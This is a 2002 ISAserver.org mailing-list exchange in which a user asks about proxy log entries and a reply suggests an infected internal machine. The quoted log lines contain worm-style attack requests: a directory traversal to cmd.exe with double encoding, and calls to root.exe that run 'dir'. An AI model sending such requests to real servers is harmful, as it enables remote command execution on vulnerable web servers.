Re: same www scripts in ISA Logs Urgent!!!
- From: "Jim Harrison" <jim@xxxxxxxxxxxx>
- To: "[ISAserver.org Discussion List]" <isalist@xxxxxxxxxxxxx>
- Date: Thu, 21 Feb 2002 07:12:31 -0800
You've clipped quite a lot of information from the log, but since the
request is being served by "w3proxy" in stead of "w3reverseproxy", it
appears that the request is coming from behind ISA. My guess; you have an
infected machine behind the ISA server.
Jim Harrison
MCP(NT4, W2K), A+, Network+, PCG
http://isaserver.org/authors/harrison/
Read the books!
----- Original Message -----
From: "Vinaykumar G" <G.Vinay@xxxxxxxxx>
To: "[ISAserver.org Discussion List]" <isalist@xxxxxxxxxxxxx>
Sent: Wednesday, February 20, 2002 19:25
Subject: [isalist] same www scripts in ISA Logs Urgent!!!
http://www.ISAserver.org
Hi All,
Iam also getting the same scripts in ISA Logs. But I see in my logs
the 401 message indicating ISA did not allow the script to be executed, is
that the case?
Below is the scripts i found in ISA Logs. What is that script
www/c/wint/system32..... what exactly is someone trying to do, How do I
block these scripts from getting executed. Please let me know urgently.
anonymous - N 2002-02-20 01:21:01 w3proxy ISA
- www - - - 70 3518 http TCP GET
http://www/MSADC/root.exe?/c+dir - - 401 - -
-
anonymous - N 2002-02-20 01:21:03
w3proxy ISA - www - - - 80 3518 http
TCP GET http://www/c/winnt/system32/cmd.exe?/c+dir - -
401 - - -
anonymous - N 2002-02-20 01:21:05
w3proxy ISA - www - - - 80 3518 http
TCP GET http://www/d/winnt/system32/cmd.exe?/c+dir - -
401 - - -
anonymous - N 2002-02-20 01:21:07
w3proxy ISA - www - - - 96 3518 http
TCP GET http://www/scripts/..%255c../winnt/system32/cmd.exe?/c+dir
- - 401 - - -
- -
Regards,
vinay.
------------------------------------------------------
You are currently subscribed to this ISAserver.org Discussion List as:
jim@xxxxxxxxxxxx
To unsubscribe send a blank email to $subst('Email.Unsub')
Other related posts:
